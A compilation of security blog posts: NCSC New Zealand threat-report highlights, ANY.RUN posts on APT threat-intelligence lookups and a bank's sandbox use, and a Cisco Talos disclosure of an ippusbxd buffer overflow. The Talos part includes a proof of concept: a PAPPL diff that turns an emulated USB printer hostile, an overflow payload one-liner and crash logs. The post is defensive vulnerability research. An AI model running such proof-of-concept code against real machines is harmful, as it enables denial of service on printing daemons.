Overview

The 2023/24 Cyber Threat Report from New Zealand’s National Cyber Security Centre (NCSC), led by Lisa Fong, Deputy Director-General for Cyber Security at the Government Communications Security Bureau (GCSB), sheds light on the country’s rapidly changing cyber threat landscape. The report highlights an increase in cyber incidents targeting individuals, businesses, and critical national sectors, underlining the growing complexity of cyber threats.

For the year ending June 2024, the NCSC recorded a whopping total of 7,122 cybersecurity incidents, marking a new milestone since CERT NZ’s integration into the NCSC. Of these incidents, 95% (6,799) were handled through the NCSC’s general triage process. These incidents primarily affected small to medium businesses and individual users and resulted in a reported financial loss of $21.6 million. While these incidents did not require specialized technical interventions, they still had a substantial impact on those affected, particularly in terms of financial losses and reputational damage.

A smaller subset of incidents, 343 in total, was categorized as having national significance. These incidents were more complex and targeted critical infrastructure or large organizations. Among them, 110 were linked to state-sponsored actors, signaling a slight increase in cyber activities from such groups. Financially motivated cybercriminal activities were responsible for 65 of these high-impact incidents, emphasizing the persistent threat from financially driven attacks such as ransomware and data exfiltration.

2023/24 Cyber Threat Report: State-Sponsored Cyber Threats and Ransomware

One of the most concerning findings in the 2023/24 Cyber Threat Report was the rise of state-sponsored cyber activities, particularly those linked to espionage. These threats have been exacerbated by geopolitical tensions, notably the ongoing Russia-Ukraine conflict. The NCSC observed an uptick in cyber incidents linked to Russian state-sponsored actors and pro-Russian hacktivists. It also noted the growing challenge in distinguishing between state-sponsored cyber activities and financially motivated criminal operations, as some cybercriminals operate with tacit state approval or support.

Ransomware continues to be a security concern, targeting both large organizations and smaller entities, including schools. Although there were efforts to disrupt certain types of financially motivated cyber incidents, experts warn that ransomware actors are evolving and diversifying their operations. Ransomware actors increasingly exploit exfiltrated data to extort payments, causing severe financial and reputational damage. Additionally, Distributed Denial-of-Service (DDoS) attacks are being utilized as an extortion tactic when encryption or data leaks are not feasible.

The Growing Threat of Cyber-Enabled Fraud

The report also highlights a rise in cyber-enabled fraud and online scams, particularly those conducted through social media platforms and cryptocurrency channels. Cybercriminals are increasingly compromising business or corporate email accounts to impersonate trusted organizations. This tactic enables them to deceive victims into sharing sensitive personal information. These types of fraud are causing significant financial and reputational harm as unsuspecting victims fall prey to sophisticated social engineering tactics.

Despite the rise in cyber incidents, the NCSC’s proactive measures in 2023/24 helped prevent an estimated $38.8 million in potential harm. Through swift interventions, the agency disrupted over 10.3 million malicious events, a sharp increase compared to previous years. The NCSC’s efforts in raising cybersecurity awareness, issuing vulnerability alerts, and promoting sector-based security collaborations are crucial in strengthening New Zealand’s collective cyber resilience.

The report strongly urges all New Zealanders and organizations to adopt effective cybersecurity practices and stay vigilant in the face of evolving cyber threats. As the country’s reliance on technology continues to grow, so does the need for better security frameworks to reduce the risk of cyberattacks.

The Role of Technology in Expanding Cyber Threats

The growing accessibility of advanced cyber tools has significantly lowered the barrier for malicious actors. Tools once reserved for well-resourced nations are now widely available to both state-sponsored actors and cybercriminals alike. This proliferation of sophisticated cyber capabilities, coupled with the widespread use of compromised credentials and vulnerabilities in public-facing infrastructure, has made it easier for malicious actors to operate at scale. The impact of these activities can be catastrophic, especially for organizations that rely heavily on technology to deliver services.

Emerging technologies like artificial intelligence and the increasing connectivity of systems have made the cyber threat landscape more complex and widespread. Cybercriminals are leveraging these advancements to launch more sophisticated attacks, exploiting vulnerabilities that were previously difficult to target.

Social Engineering and Phishing Attacks

Social engineering remains one of the most successful tactics used by cybercriminals to deceive victims into compromising their personal information. By exploiting human psychology, attackers manipulate individuals into taking actions that compromise their security.

The NCSC has seen an increase in social engineering tactics, particularly phishing scams targeting individuals and organizations alike. While technological defenses like multi-factor authentication (MFA) can mitigate some attacks, phishing remains a powerful and persistent tool for cybercriminals.

In 2023, the NCSC recorded global data breaches, some of which involved New Zealanders’ personal information. These breaches expose individuals to further cyber risks, such as phishing and account compromises, which remain prevalent and often lead to significant financial losses.

Trends in Cybersecurity Incidents

The NCSC categorizes incidents based on severity, with the most significant incidents classified as C3. These high-impact incidents often involve ransomware or data exfiltration activities and affect critical infrastructure or key organizations. The report notes that 2023 saw a decline in ransomware incidents compared to previous years, although the attacks that did occur were still highly disruptive. While ransomware remains a concern, other types of attacks, such as phishing and malware, are equally problematic.

In contrast to C3 incidents, moderate (C4) and routine (C5) incidents saw an increase in frequency. Many of these incidents were linked to vulnerabilities being exploited multiple times.

Conclusion

The 2023/24 Cyber Threat Report from New Zealand’s NCSC highlights the increasingly complex nature of cyber threats despite a decrease in overall incident volume. The most common attack techniques included exploiting vulnerabilities in public-facing applications and reconnaissance activities like vulnerability scanning and credential gathering.

The report also emphasizes the growing risk of adversary-in-the-middle (AITM) phishing attacks, which bypass traditional security measures like MFA, urging organizations to adopt more robust solutions such as phishing-resistant MFA methods. While the NCSC’s proactive efforts have successfully mitigated many threats, the expanding reliance on technology and the growing availability of cyber capabilities necessitate ongoing vigilance and adaptability.

References

• https://www.ncsc.govt.nz/news/cyber-threat-report-2024
• https://www.ncsc.govt.nz/assets/NCSC-Documents/NCSC-Cyber-Threat-Report-2024-FINAL.pdf

The post New Zealand’s National Cyber Security Centre (NCSC) Reports Surge in Cyber Threats and Vulnerabilities appeared first on Cyble.

Blog – Cyble – ​Read More

Advanced persistent threats (APTs) stand out as one of the most formidable challenges for businesses in the cybersecurity landscape. These threats can cause irreparable damage, leading to financial losses, data breaches, and reputational harm. 

APTs are defined as sophisticated targeted attacks typically conducted by highly funded adversaries: national agencies, state-sponsored groups, organized crime groups, corporate espionage actors.  

What Are APTs 

The name speaks for itself, APTs are:   

• Advanced: Having at hackers’ disposal the full (and ever-growing) arsenal of techniques and tools to get and maintain access to the target.  

• Persistent: The aim is to keep long-term access to the targeted system or network. This involves constant improving and updating of the tools to evade detection.  

• Threats: Such campaigns are intentionally malicious and inevitably harmful. They are backed by coordinated actions of skilled, motivated, organized, and well-resourced professionals.  

Why Are APTs a Significant Threat to Businesses 

APTs prefer to target large corporations, government entities, and critical infrastructure. Finance, manufacturing, healthcare, and energy are prime targets for APTs due to the high value of their assets, data and infrastructure. The consequences of a successful APT attack extend beyond financial loss and corporate damage — they can impact national security, cause market instability, disrupt economies, and put lives at risk. 
 
But no business, however modest-scale and unrelated to strategic industries, can consider itself safe:  

• Small and medium companies still possess valuable assets, handle sensitive customer information, financial data, or intellectual property 
• They are part of supply chains that can be disrupted by attacks 
• A successful infiltration into their communications grants access to larger partners or clients. 
• Along with all this, they have weaker security posture, invest less in cyber threat prevention. 

Detect Early, Defend Better: The Power of Threat Intelligence 

Threat intelligence is a pivotal element of an APT-resistant cybersecurity strategy. By gathering, analyzing, and applying intelligence on cyber threats, organizations can proactively detect and neutralize them before they escalate.  
 
TI provides: 

• Early Detection: Identifying indicators of compromise (IOCs) before damage occurs. 
• Behavioral Analysis: Understanding attacker tactics, techniques, and procedures (TTPs) to anticipate movements. 
• Threat Hunting: Actively searching for hidden threats within the network. 
• Stronger Security Posture: Defenses based on real-world threat insights. 
• Incident Response Efficiency: Rapidly responding to and mitigating APT incidents. 

How Threat Intelligence Lookup Facilitates APT Reconnaissance 

ANY.RUN’s Threat Intelligence Lookup is a solution fit for all these tasks: a state-of-the-art search engine for threat researchers and cybersecurity teams. It provides detailed insights into indicators of compromise (IOCs), malware behavior, and attack patterns.  
 
It supports over 40 search parameters to query a constantly updated database of threat data, collected from millions of public malware and phishing samples and manually analyzed by a team of threat analysts.  
 
For a business, it’s a source of actionable information for preventing, detecting and mitigating all sorts of cyberattacks up to APTs, thus avoiding operational disruptions, financial and reputational damages.  

How TI Lookup helps track APTs 

Wicked Panda APT: Closer Look at an Abused Registry Key 

A notorious Chinese APT group, APT41 aka Wicked Panda, employs a PowerShell-backdoor for compromising systems.

To maintain persistence, it adds its payload in Windows registry entry HKCUEnvironmentUserInitMprLogonScript which allows it to run malicious code automatically at each user login into the system. Besides, the hackers abuse a legitimate Microsoft’s forfiles.exe utility.  
 
This data is enough to combine a query for TI Lookup:

registryKey:”HKEY_CURRENT_USERENVIRONMENT” AND registryValue:”forfiles.exe” AND threatName:”backdoor” AND registryName:”USERINITMPRLOGONSCRIPT” 

From the search results, we can extract additional IOCs associated with such campaigns, like file hashes or mutexes, and use them for setting up threat detection and alerts.

The Tasks tab shows recent sandbox sessions with analysis of the attack. The sessions can be viewed in ANY.RUN’s Interactive Sandbox to study TTPs and other components of the attack.

MuddyWater APT: Identifying a Backdoor via Mutexes 

Another example: MuddyWater APT group from Iran is known for using PackageManager and DocumentUpdater mutexes in their malware campaigns. The mutexes are generated by their BugSleep backdoor.  
 
The attack starts through a phishing email, BugSleep gets deployed, creates a mutex and decrypts its configuration, including the addresses of command-and-control servers. This behavior has been observed in MuddyWater campaigns targeting organizations in Israel and other countries. 
 
We can accommodate both mutexes into a TI Lookup search request:  
 
(syncObjectName:”PackageManager” or syncObjectName:”DocumentUpdater”) and syncObjectOperation:”Create” and threatName:”muddywater” 

Diving deeper in the search results, we can identify the actual samples that use this mutex.

We can navigate to the sandbox sessions where these mutexes were used to explore the threat and its behavior in greater detail.

Lazarus Group: Following North Korea’s Biggest APT

Lazarus is one of the most active threats coming from North Korea. The group has been involved in many cyber attacks on both businesses and individuals. One of the recent examples involved conducting fake interviews with tech professionals to install malicious programs on their devices.

With TI Lookup, we can not only explore the most recent samples and collect indicators related to Lazarus but also subscribe to receive updates on specific queries.

Let’s use the simple query like threatName:”lazarus” and click the bell icon to subscribe to updates.

As soon as new indicators or sandbox sessions relevant to the query appear in TI Lookup’s database, we will be notified about them.

Learn more about notifications in TI Lookup

Conclusion 

APTs represent a high level of cyber threat due to their strategic nature, the resources behind them, and their capability to adapt and evolve over time. Organizations, especially those in critical sectors or handling sensitive information, need robust cybersecurity strategies to defend against such threats. Threat intelligence is a cornerstone of such a strategy, and TI Lookup from ANY.RUN has proven itself as a comprehensive tool for fueling intelligence with fresh contextual data. 

About ANY.RUN

ANY.RUN helps more than 500,000 cybersecurity professionals worldwide. Our interactive sandbox simplifies malware analysis of threats that target both Windows and Linux systems. Our threat intelligence products, TI Lookup, YARA Search, and Feeds, help you find IOCs or files to learn more about the threats and respond to incidents faster.

Request free trial of ANY.RUN’s services → 

The post How to Track Advanced Persistent Threats appeared first on ANY.RUN’s Cybersecurity Blog.

ANY.RUN’s Cybersecurity Blog – ​Read More

Recently we had a chance to sit down for a chat with the Head of Cybersecurity at an investment bank. An hour-long conversation gave a sneak peek into the work of their cybersec team, challenges they face, and the use of ANY.RUN’s Interactive Sandbox.  

Here’s what we learned. 

Company and Team Overview 

We’re an investment bank based in Brussels. The total number of employees is about 750 people with 12 of them being on my cybersecurity team. Just like most companies out there we have to make do with limited resources and stay lean. That means wearing multiple hats and sharing different roles depending on the current situation at hand. Our threat analysts can jump in and handle incident response if need be and so on.  

What Made the Team Look for a Sandbox 

When I first took over this role, coming from a large international bank, my number one task was to take a look at the business’s entire cybersecurity setup and find ways to make it more efficient. In reality, it turned out to be messier than I expected. 

The team was literally getting swamped with alerts every day with no end in sight. Thankfully, having seen what a properly functioning cybersecurity department looks from the old job, I knew what kind of levers I had to start pulling to get the things to where they had to be. 

Fixing workflow meant new tools. A good malware sandbox was at the top of the list. Back at the large bank we had a whole selection of these from different vendors, including ANY.RUN. The CISO there often said, “Investing in good cybersecurity costs less than the incidents it prevents.” That helped a lot in securing budget whenever we wanted to test a new tool. 

Investing in good cybersecurity costs less than the incidents it prevents.

Basically, because I’d already seen sandboxes in action, I knew how critical they would be for building a more effective department. But if you are going to press me to pick one thing that made me jump to sandboxes right away, it was the speed boost they offered. Not just in terms of malware analysis, I mean across the board, for everything from spotting threats to responding to incidents.  

So, it was a total no-brainer to start looking at sandbox options from the day I stepped into my role. 

Why ANY.RUN 

After spending a week scrolling through vendors’ websites, I decided to just put together all the must-haves I wanted to see in the ideal solution. Eventually it came down to the two main features, apart from the basic stuff, of course. 

Banking means a ton of data privacy compliance, so we had to know our data would be secure in the sandbox and that it would meet all the regulations. Vendor’s privacy policies, the location of their servers, and how they handled data were really important. 

Naturally, threat detection performance was essential. But practicality for the team was also crucial. We needed a tool that gave us as many insights as possible, be it network traffic or system logs. It had to be helpful for both our initial triage and our more in-depth incident response work. 

And after I threw in ANY.RUN’s price, the choice became obvious. 

How Long They’ve Been Using ANY.RUN 

We’ve been using ANY.RUN for approximately 18 months now. 

Sandbox’s Impact on CyberSec Operations 

Integrating the sandbox was part of a bigger workflow overhaul, so we saw results almost instantly, in the first week. The team was able to churn through alerts and threat analysis at least twice as fast. This saved the bank hefty sums of money on incident response and recovery that were avoided thanks to our timely actions. But it was not just about going faster, though.   

Our threat understanding improved too. And it’s really down to ANY.RUN’s VM control. It lets the team explore files, browse websites, download and execute files. The hands-on approach saves hours of work and has now become our secret weapon for understanding complex malware behavior in the shorter time period. It is also much cheaper and more effective than running custom-built VMs on isolated computers that require a week of preparation. 

The combination of speed and knowledge allowed us to identify and prevent cyber attacks better than ever before.

The combination of speed and knowledge allowed us to identify and prevent cyber attacks better than ever before. It also helped us plan smarter, strategically and tactically, and respond to attacks much more effectively.

How ANY.RUN Fits into Larger Cybersecurity Strategy 

We regularly use ANY.RUN with other security solutions, which once again contributes to more efficient workflows, faster reaction time, and no money lost for the company.  

In one of the instances, the API helps us automatically submit suspicious files from our email gateway and other sources directly to the sandbox for analysis. When running the sandbox with an endpoint security solution, I recommend turning the automated mode on (Automated Interactivity — Editor). The service does a good job identifying threats on its own, which once again gives us a chance to save time for our team members. 

Common Threats Faced by the Bank 

Everyone knows that the financial industry is the number one target for criminals. That is why we face a myriad of threats at the same time. But for us, social engineering threats like phishing emails are a constant headache. The number of ransomware and credential stealing attempts we have prevented thanks to the sandbox is already in the hundreds. Had we not identified them, this would be devastating for the business.  

The number of ransomware and credential stealing attempts we have prevented thanks to the sandbox is already in the hundreds.

Beyond just reacting to threats, we also use the sandbox for proactive threat hunting. When we encounter new, unknown malware strains, we detonate them in the sandbox specifically to collect detailed behavioral data. This intelligence then allows us to enrich our detection rules across our security infrastructure and better protect against future variations of these threats. 

Stopping Ransomware from a Supplier Email 

Let me share a concrete example where the sandbox truly proved its worth. One day we received an email from our long-term supplier. It was a fairly routine communication, but it contained a zip attachment with a password, which raised a red flag for our email security system.  

Following our procedures, one of the analysts detonated the email within the sandbox, opened the archive, and discovered an executable inside. After the executable ran in the sandbox environment, we quickly saw the entire attack chain: the executable turned out to be a loader, which downloaded and initiated a ransomware within the virtual machine. 

Timely sandboxing prevented the company from suffering millions of dollars in losses, damaged reputation, and years of litigation.

Thanks to the sandbox, we were able to identify this ransomware threat before it could reach any of our actual systems. We blocked the email across our organization and warned other departments about this specific phishing campaign. Timely sandboxing prevented the company from suffering millions of dollars in losses, damaged reputation, and years of litigation.

Future Plans 

We never stop improving our security infrastructure, and with strong advancements in AI, we cannot afford to ignore this trend. Right now we focus on AI-assisted automation and our plans include deeper integration with the SOAR and SIEM platforms. 

Of course, the AI-powered analysis within ANY.RUN’s sandbox fits perfectly into this strategy. Our team regularly turns to this feature for quick tips on the malicious activities detected during analysis.  

Advice for Other Organizations Choosing a Sandbox 

Before you even start evaluating vendors, be crystal clear about why you need a sandbox and what specific security problems you’re trying to solve. What are your biggest malware-related pain points? Having defined use cases will help you focus your evaluation and ensure the sandbox you choose truly addresses your needs. 

But let’s be honest: no security solution is a magic bullet. The final decision always rests with you and your team. 

Conclusion 

We want to thank the guest for sharing their detailed insights into the inner workings of a security team at a financial institution. We hope this story can help other organizations facing similar issues. If you are using ANY.RUN’s products and willing to share your experiences with the community, please send us an email at content@any.run. 

How ANY.RUN’s Services Help Banks 

ANY.RUN’s suite of cybersecurity tools is trusted by numerous businesses in the finance industry. 

• Interactive Sandbox offers fast and extensive malware and phishing analysis to streamline security operations and maintain better defense. 

• TI Lookup provides instant context for indicators of compromise (IOCs), indicators of behavior (IOBs), and indicators of attack (IOAs) to help banks speed up incident response, threat hunting, and save resources. 

• TI Feeds allows banks to identify emerging threats before they have a chance to inflict damage by supplying a real-time stream of network indicators. 

Test ANY.RUN’s tools in your organization with 14-day free trial →

The post I Used a Sandbox to Strengthen Bank’s Security—Here’s How It Worked appeared first on ANY.RUN’s Cybersecurity Blog.

ANY.RUN’s Cybersecurity Blog – ​Read More

By Aleksandar Nikolich

Earlier this year, we conducted code audits of the macOS printing subsystem, which is heavily based on the open-source CUPS package. During this investigation, IPP-USB protocol caught our attention. IPP over USB specification defines how printers that are available over USB can only still support network printing via Internet Printing Protocol (IPP). After wrapping up the macOS investigation, we decided to take a look at how other operating systems handle the same functionality. 

Our target Linux system was running Ubuntu 22.04, a long-term support (LTS) release that handled IPP-USB via the “ippusbxd” package. This package is part of the OpenPrinting suite of printing tools that was under a lot of scrutiny recently due to several high severity vulnerabilities in different components. Publicity around these issues has caused undue stress on the OpenPrinting suite maintainers, so, although the potential vulnerability we are about to discuss is very real, mitigating circumstances make it less severe. The vulnerability is discovered and made unexploitable by modern compiler features, and we are highlighting this rare win. Additionally, the “ippusbxd” package is replaced by a safer “ipp-usb” solution, making exploitation of this vulnerability less likely.

Discovering the vulnerability

On Ubuntu-flavored Linux systems, when a new USB printer is plugged in, UDEV subsystem will invoke an IPP-USB handler to enable IPP-USB functionality. In Ubuntu 22.04, this is “ippusbxd” daemon, which handles communication with the printer, announces it to the network over DNS-SD, and makes it available on a network port. As this has a potential for an interesting attack surface, it piqued our interest.

The first step when getting familiar with a code base is to try to build it. While doing so, we were presented with the following message:

In file included from /usr/include/string.h:495,
                 from ippusbxd-1.34/src/capabilities.c:9:
In function ‘strncpy’,
    inlined from ‘get_format_paper’ at ippusbxd-1.34/src/capabilities.c:205:9:
/usr/include/x86_64-linux-gnu/bits/string_fortified.h:106:10: warning: ‘__builtin___strncpy_chk’ 
              specified bound depends on the length of the source argument [-Wstringop-overflow=]
  106 |   return __builtin___strncpy_chk (__dest, __src, __len, __bos (__dest));
      |          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
ippusbxd-1.34/src/capabilities.c: In function ‘get_format_paper’:
ippusbxd-1.34/src/capabilities.c:204:13: note: length computed here
  204 |         a = strlen(val) - strlen(tmp);
      |             ^~~~~~~~~~~
In file included from /usr/include/string.h:495,
                 from ippusbxd-1.34/src/capabilities.c:9: 

Above is a compiler warning, enabled by “-Wstringop-overflow”, which performs lightweight static code analysis during compilation to catch common memory corruption issues. In this particular case, the compiler is telling us that there exists a potential vulnerability in the highlighted code. Essentially, compiler analysis has judged that a length argument to a “strncpy” call is based on the length of the source operand instead of the destination operand. This is a classic case of a stack-based buffer overflow involving the “strcpy” family of functions. 

To confirm that this is indeed a true positive finding, we looked at code context:

char test1[255] = { 0 };
       char test2[255] = { 0 };
       char *tmp = strchr(val, '=');
       if (!tmp) continue;
       a = strlen(val) - strlen(tmp);           
       val+=(a + 1);
       tmp = strchr(val, ' ');
       if (!tmp) continue;
       a = strlen(val) - strlen(tmp);                                    
       strncpy(test2, val, a);                 

The above excerpt is in the part of the code that is trying to parse paper dimensions supported by the printer. Expected input would be:

{ x-dimension=1234 y-dimension=1234 }

Calls to “strlen” are used to calculate the length of the incoming numerical values, and the code can indeed result in a straightforward buffer overflow if the value specified in ”y-dimension” is longer than the buffer can hold.

Looking up the users of the offending code reveals that it’s only used during printer initialization, while interrogating printer capabilities:

int
ipp_request(ippPrinter *printer, int port)
{
  http_t    *http = NULL; 
  ipp_t *request, *response = NULL;
  ipp_attribute_t *attr;
  char uri[1024];
  char buffer[1024];
  /* Try to connect to IPP server */
  if ((http = httpConnect2("127.0.0.1", port, NULL, AF_UNSPEC,
               HTTP_ENCRYPTION_IF_REQUESTED, 1, 30000, NULL)) == NULL) {
    printf("Unable to connect to 127.0.0.1 on port %d.n", port);
    return 1;
  }
  snprintf(uri, sizeof(uri), "http://127.0.0.1:%d/ipp/print", port);
  /* Fire a Get-Printer-Attributes request */
  request = ippNewRequest(IPP_OP_GET_PRINTER_ATTRIBUTES);
  ippAddString(request, IPP_TAG_OPERATION, IPP_TAG_URI, "printer-uri",
                 NULL, uri);
  response = cupsDoRequest(http, request, "/ipp/print");

In other words, this vulnerability would be triggered if a printer connected to a machine’s USB port reports supporting abnormally large media size

The compiler was right, this indeed constitutes a vulnerability. If exploited against a locked laptop, it could result in arbitrary code execution in a process with high privileges. 

Developing a proof of concept

To prove the existence and severity of this vulnerability, we need to develop a proof of concept (PoC) exploit. Since triggering this vulnerability technically requires a malicious printer being physically connected to the USB port, we have some work to do. 

An obvious route for implementing this is by using Linux USB Gadget API. The Linux USB Gadget API allows developers to create custom software-defined USB devices (i.e., gadgets). It enables device emulation, interface management, and communication protocol handling for virtual devices. In this scenario, an embedded Linux system acts as a USB device, instead of a USB host, and emulates desired functionality. Gadget drivers emulating an ethernet network interface or mass storage device are readily available in all Linux systems, and small single board computers can be used for this purpose. Among these, Raspberry Pi Zero fits all the requirements. 

Implementing a whole emulated USB printer would require significant effort, but PAPPL (a project related to OpenPrinting) already implements a featureful printer gadget that we can easily repurpose. A minimal modification to the source code is required to make the emulated printer report malicious media dimensions:

diff --git a/pappl/printer-driver.c b/pappl/printer-driver.c
index 10b7fda..b872865 100644
--- a/pappl/printer-driver.c
+++ b/pappl/printer-driver.c
@@ -747,6 +747,7 @@ make_attrs(
       ippDelete(cvalues[i]);
   }
+  ippAddString(attrs, IPP_TAG_PRINTER, IPP_CONST_TAG(IPP_TAG_KEYWORD), "media-size-supported",  NULL, getenv("EXPLOIT_STRING"));                      [5]
   // media-col-supported
   memcpy((void *)svalues, media_col, sizeof(media_col));
diff --git a/testsuite/testpappl.c b/testsuite/testpappl.c
index 460058d..7972cb6 100644
--- a/testsuite/testpappl.c
+++ b/testsuite/testpappl.c
@@ -812,7 +812,7 @@ main(int  argc,                             // I - Number of command-line arguments
     }
     else
     {
-      printer = papplPrinterCreate(system, /* printer_id */0, "Office Printer", "pwg_common-300dpi-600dpi-srgb_8", "MFG:PWG;MDL:Office Printer;", device_uri);
+      printer = papplPrinterCreate(system, /* printer_id */0, "Office Printer", "pwg_common-300dpi-600dpi-srgb_8", "MFG:PWG;MDL:Office Printer;CMD:pwg;", device_uri);         [4]
       papplPrinterSetContact(printer, &contact);
       papplPrinterSetDNSSDName(printer, "Office Printer");
       papplPrinterSetGeoLocation(printer, "geo:46.4707,-80.9961");

In the above code, we instruct the emulated printer to use contents of the “EXPLOIT_STRING” environment variable as its “media-size-supported” payload. 

To set up the trigger, we first set the `EXPLOIT_STRING` to contain our buffer overflow payload:

export EXPLOIT_STRING=`perl -e 'print "{x=a y=" . "A"x600 . " }"'`

Above will report `y` dimension to have a series of 600 A characters–enough to overflow both stack buffers and cause a crash. 

Then, we run the following on our Raspberry Pi Zero device:

testsuite/testpappl -U -c -1 -L debug -l - --usb-vendor-id 0xeaea --usb-product-id 0xeaea

The above command, using a utility from PAPPL suite, sets up an emulated USB printer device that will, when connected via USB to our target machine, deliver our buffer overflow payload. 

The next step is to simply connect the Raspberry Pi Zero device to the target and observe the effect:

[520463.829183] usb 3-1: new high-speed USB device number 85 using xhci_hcd
[520463.977791] usb 3-1: New USB device found, idVendor=eaea, idProduct=eaea, bcdDevice= 4.19
[520463.977800] usb 3-1: New USB device strings: Mfr=1, Product=2, SerialNumber=3
[520463.977804] usb 3-1: Product: Office Printer
[520463.977807] usb 3-1: Manufacturer: PWG
[520463.977809] usb 3-1: SerialNumber: 0
[520463.979354] usblp 3-1:1.0: usblp0: USB Bidirectional printer dev 85 if 0 alt 0 proto 2 vid 0xEAEA pid 0xEAEA
[520464.014666] usblp0: removed
[520464.020827] ippusbxd[647107]: segfault at 0 ip 00007f9886cd791d sp 00007ffe5965e558 error 4 in libc.so.6[7f9886b55000+195000]
[520464.020839] Code: 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 f3 0f 1e fa 89 f8 48 89 fa c5 f9 ef c0 25 ff 0f 00 00 3d e0 0f 00 00 0f 87 23 01 00 00 <c5> fd 74 0f c5 fd d7 c1 85 c0 74 57 f3 0f bc c0 e9 2c 01 00 00 66

The above debug log shows that a segmentation fault has occurred in `ippusbxd` daemon as expected, signifying that we have successfully triggered this vulnerability.

FORTIFY_SOURCE

However, closer inspection of the binary and the crash reveals the following:

<-195299776>Note: TCP: sent 1833 bytes
<-228919744>Note: Thread #2: No read in flight, starting a new one
*** buffer overflow detected ***: terminated
Thread 4 "ippusbxd" received signal SIGABRT, Aborted.
[Switching to Thread 0x7ffff3dbe640 (LWP 649455)]
__pthread_kill_implementation (no_tid=0, signo=6, threadid=140737284662848) at ./nptl/pthread_kill.c:44
44      ./nptl/pthread_kill.c: No such file or directory.
(gdb) bt
#0  __pthread_kill_implementation (no_tid=0, signo=6, threadid=140737284662848) at ./nptl/pthread_kill.c:44
#1  __pthread_kill_internal (signo=6, threadid=140737284662848) at ./nptl/pthread_kill.c:78
#2  __GI___pthread_kill (threadid=140737284662848, signo=signo@entry=6) at ./nptl/pthread_kill.c:89
#3  0x00007ffff7aea476 in __GI_raise (sig=sig@entry=6) at ../sysdeps/posix/raise.c:26
#4  0x00007ffff7ad07f3 in __GI_abort () at ./stdlib/abort.c:79
#5  0x00007ffff7b31676 in __libc_message (action=action@entry=do_abort, fmt=fmt@entry=0x7ffff7c8392e "*** %s ***: terminatedn") at ../sysdeps/posix/libc_fatal.c:155
#6  0x00007ffff7bde3aa in __GI___fortify_fail (msg=msg@entry=0x7ffff7c838d4 "buffer overflow detected") at ./debug/fortify_fail.c:26
#7  0x00007ffff7bdcd26 in __GI___chk_fail () at ./debug/chk_fail.c:28
#8  0x00007ffff7bdc769 in __strncpy_chk (s1=s1@entry=0x7ffff3dbd090 "", s2=s2@entry=0x7ffff3dbd5f7 'A' <repeats 200 times>..., n=n@entry=601, s1len=s1len@entry=255) at ./debug/strncpy_chk.c:26
#9  0x000055555555f502 in strncpy (__len=601, __src=0x7ffff3dbd5f7 'A' <repeats 200 times>..., __dest=0x7ffff3dbd090 "") at /usr/include/x86_64-linux-gnu/bits/string_fortified.h:95
#10 get_format_paper (val=0x7ffff3dbd5f7 'A' <repeats 200 times>..., val@entry=0x7ffff3dbd5f0 "{x=a y=", 'A' <repeats 193 times>...) at ./ippusbxd_testing/ippusbxd-1.34/src/capabilities.c:220
#11 0x000055555555fa62 in ipp_request (printer=printer@entry=0x7fffec000b70, port=<optimized out>) at ./ippusbxd_testing/ippusbxd-1.34/src/capabilities.c:297
#12 0x000055555555d07c in dnssd_escl_register (data=0x5555555a77e0) at ./ippusbxd_testing/ippusbxd-1.34/src/dnssd.c:226
#13 0x00007ffff7b3cac3 in start_thread (arg=<optimized out>) at ./nptl/pthread_create.c:442
#14 0x00007ffff7bce660 in clone3 () at ../sysdeps/unix/sysv/linux/x86_64/clone3.S:81

What caused the crash wasn’t directly the buffer overflow that overwrote stack content causing memory corruption. Nor was it stack smashing protection, a probabilistic mitigation that can be bypassed under certain conditions. In this case, the crash was caused by explicit program termination due to a detected condition for buffer overflow before it happened. This detection is the result of a compiler feature called “FORTIFY_SOURCE”, which replaces common error-prone functions with safer versions automatically. This means that the vulnerability is strongly mitigated and isn’t exploitable beyond causing a crash. 

Conclusion

We often hear of all the failings of software and vulnerabilities and mitigation bypasses, and we felt we should take this opportunity to highlight the opposite. In this case, modern compiler features, static analysis via -Wstringop-overflow and strong mitigation via FORTIFY_SOURCE, saved the day. These should always be enabled by default. Additionally, those compiler warnings are only useful if someone actually reads them. 

In this case, the impact of this vulnerability would be minor even if it were widely exploitable. The `ippusbxd` package development was abandoned in favor of a superior implementation via the “ipp-usb package implemented in a memory safe language that would prevent these sorts of issues from occurring in the first place. Developers readily point out that `ippusbxd` has been surpassed by `ipp-usb`, isn’t maintained, and isn’t used by any operating system. Ubuntu 22.04 being a long-term support version is an exception. Newer versions have switched to using `ipp-usb`. 

Cisco Talos Blog – ​Read More